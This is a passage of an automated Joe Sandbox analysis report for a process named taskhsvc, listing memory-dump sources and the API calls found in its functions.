    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002F2219
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003265E9: strerror.MSVCRT ref: 003266A8
      • Part of subcall function 003265E9: abort.MSVCRT ref: 00326730
      • Part of subcall function 003265E9: __stack_chk_fail.LIBSSP-0 ref: 00326762
    • __stack_chk_fail.LIBSSP-0 ref: 003267D4
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002B3B52: __stack_chk_fail.LIBSSP-0 ref: 002B3C6E
    • __stack_chk_fail.LIBSSP-0 ref: 001C4B69
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 00313277
      • Part of subcall function 00312E50: abort.MSVCRT ref: 00312F7F
      • Part of subcall function 00312E50: abort.MSVCRT ref: 003131E3
      • Part of subcall function 00312E50: __stack_chk_fail.LIBSSP-0 ref: 00313200
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0022D5B4: memset.MSVCRT ref: 0022D62C
      • Part of subcall function 0022D5B4: strchr.MSVCRT ref: 0022D699
      • Part of subcall function 0022D5B4: strlen.MSVCRT ref: 0022D73F
      • Part of subcall function 0022D5B4: free.MSVCRT ref: 0022DB41
      • Part of subcall function 0022D5B4: free.MSVCRT ref: 0022DB91
      • Part of subcall function 0022D5B4: __stack_chk_fail.LIBSSP-0 ref: 0022DBB1
    • __stack_chk_fail.LIBSSP-0 ref: 00220115
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00237498: __stack_chk_fail.LIBSSP-0 ref: 002374B8
      • Part of subcall function 00313207: __stack_chk_fail.LIBSSP-0 ref: 00313277
    • __stack_chk_fail.LIBSSP-0 ref: 001C39F0
      • Part of subcall function 0023AD19: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0024EF37), ref: 0023AD77
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001CDB1E: free.MSVCRT ref: 001CDB6C
      • Part of subcall function 001CDB1E: __stack_chk_fail.LIBSSP-0 ref: 001CDB86
      • Part of subcall function 001CDAA5: time.MSVCRT ref: 001CDAE9
      • Part of subcall function 001CDAA5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CDBD6), ref: 001CDB17
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF51), ref: 001CDC05
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00287868: abort.MSVCRT ref: 002878D8
      • Part of subcall function 00287868: __stack_chk_fail.LIBSSP-0 ref: 00287904
    • __stack_chk_fail.LIBSSP-0 ref: 001C4415
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003267DB: __stack_chk_fail.LIBSSP-0 ref: 0032685E
    • __stack_chk_fail.LIBSSP-0 ref: 003268C7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00210D7D: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021307F), ref: 00210DD3
      • Part of subcall function 00210D7D: __stack_chk_fail.LIBSSP-0 ref: 00210E2D
      • Part of subcall function 00205A71: __stack_chk_fail.LIBSSP-0 ref: 00205CBF
      • Part of subcall function 002141A4: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021456D), ref: 00214227
      • Part of subcall function 002141A4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021456D), ref: 00214241
      • Part of subcall function 001C262A: abort.MSVCRT ref: 001C267A
      • Part of subcall function 001C262A: event_add.LIBEVENT-2-0-5 ref: 001C26E4
      • Part of subcall function 001C262A: __stack_chk_fail.LIBSSP-0 ref: 001C2745
    • __stack_chk_fail.LIBSSP-0 ref: 00214595
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 00315AA7: rename.MSVCRT ref: 00315B14
      • Part of subcall function 00315AA7: __stack_chk_fail.LIBSSP-0 ref: 00315B24
    • __stack_chk_fail.LIBSSP-0 ref: 003167E8
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032E618: GetAdaptersAddresses.IPHLPAPI ref: 0032E706
      • Part of subcall function 0032E618: free.MSVCRT ref: 0032E728
      • Part of subcall function 0032E618: free.MSVCRT ref: 0032E7DC
      • Part of subcall function 0032E618: __stack_chk_fail.LIBSSP-0 ref: 0032E7F6
    • __stack_chk_fail.LIBSSP-0 ref: 0032E852
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003211F6: abort.MSVCRT ref: 0032125C
      • Part of subcall function 003211F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00268186), ref: 00260ABA
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C7086: event_new.LIBEVENT-2-0-5 ref: 001C7114
      • Part of subcall function 001C7086: event_add.LIBEVENT-2-0-5 ref: 001C714C
      • Part of subcall function 001C7086: event_new.LIBEVENT-2-0-5 ref: 001C71CC
      • Part of subcall function 001C7086: __stack_chk_fail.LIBSSP-0 ref: 001C7211
      • Part of subcall function 002581BD: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C6001), ref: 002581E5
    • __stack_chk_fail.LIBSSP-0 ref: 001C63EC
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00316FAD: socket.WS2_32 ref: 0031701F
      • Part of subcall function 00316FAD: __stack_chk_fail.LIBSSP-0 ref: 00317080
    • __stack_chk_fail.LIBSSP-0 ref: 00316FA6
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002BF9F0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002BF9BB), ref: 002BFA9D
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002C18A7), ref: 002BF9E9
      • Part of subcall function 002C0435: free.MSVCRT ref: 002C059D
      • Part of subcall function 002C0435: __stack_chk_fail.LIBSSP-0 ref: 002C05F7
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002A622F: __stack_chk_fail.LIBSSP-0 ref: 002A635C
      • Part of subcall function 002A6394: __stack_chk_fail.LIBSSP-0 ref: 002A6427
      • Part of subcall function 001C2D88: __stack_chk_fail.LIBSSP-0 ref: 001C2DFB
      • Part of subcall function 00274695: __stack_chk_fail.LIBSSP-0 ref: 00274746
      • Part of subcall function 0025B0C8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025A37E,?,?,?,?,?,?,?,?,?,0025A412), ref: 0025B107
    • __stack_chk_fail.LIBSSP-0 ref: 001C4935
      • Part of subcall function 002A8ABB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002B3C20), ref: 002A8AF4
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002B2B73: __stack_chk_fail.LIBSSP-0 ref: 002B2C58
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00233A48), ref: 002B2C98
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313FDC), ref: 00332060
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 00273787: abort.MSVCRT ref: 002737EC
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027382B
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027387B
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027395E
      • Part of subcall function 00273787: memcpy.MSVCRT ref: 002739F6
      • Part of subcall function 00273787: __stack_chk_fail.LIBSSP-0 ref: 00273AAC
    • __stack_chk_fail.LIBSSP-0 ref: 001DEAB7
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002E6A4B: abort.MSVCRT ref: 002E6AAF
      • Part of subcall function 002E6A4B: abort.MSVCRT ref: 002E6B04
      • Part of subcall function 002E6A4B: __stack_chk_fail.LIBSSP-0 ref: 002E6B81
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0022A9F8), ref: 00223769
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0033202E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313FDC), ref: 00332060
    • __stack_chk_fail.LIBSSP-0 ref: 00332958
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00326206: abort.MSVCRT ref: 00326275
      • Part of subcall function 00326206: fclose.MSVCRT ref: 0032628D
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003262A6
      • Part of subcall function 00326206: _close.MSVCRT ref: 00326301
      • Part of subcall function 00326206: strerror.MSVCRT ref: 00326316
      • Part of subcall function 00326206: abort.MSVCRT ref: 003263BD
      • Part of subcall function 00326206: _unlink.MSVCRT ref: 003263D0
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003263EE
      • Part of subcall function 00326206: strcmp.MSVCRT ref: 00326444
      • Part of subcall function 00326206: abort.MSVCRT ref: 00326481
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003264AD
      • Part of subcall function 00326206: free.MSVCRT ref: 00326508
      • Part of subcall function 00326206: free.MSVCRT ref: 00326530
      • Part of subcall function 00326206: free.MSVCRT ref: 00326552
      • Part of subcall function 00326206: __stack_chk_fail.LIBSSP-0 ref: 0032656C
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0031F06F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF47), ref: 0031F0A7
      • Part of subcall function 001CDB8D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF51), ref: 001CDC05
      • Part of subcall function 001CEE56: time.MSVCRT ref: 001CEE77
      • Part of subcall function 001CEE56: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7367), ref: 001CEE98
    • __stack_chk_fail.LIBSSP-0 ref: 001CAF62
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • __stack_chk_fail.LIBSSP-0 ref: 001E60E6
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E87F0: abort.MSVCRT ref: 001E8846
      • Part of subcall function 001E87F0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F3A5F), ref: 001E8859
    • __stack_chk_fail.LIBSSP-0 ref: 001F3C1F
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00211340: abort.MSVCRT ref: 0021139A
      • Part of subcall function 00211340: abort.MSVCRT ref: 00211425
      • Part of subcall function 00211340: __stack_chk_fail.LIBSSP-0 ref: 00211595
    • __stack_chk_fail.LIBSSP-0 ref: 001F36AB
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd

    Non-executed Functions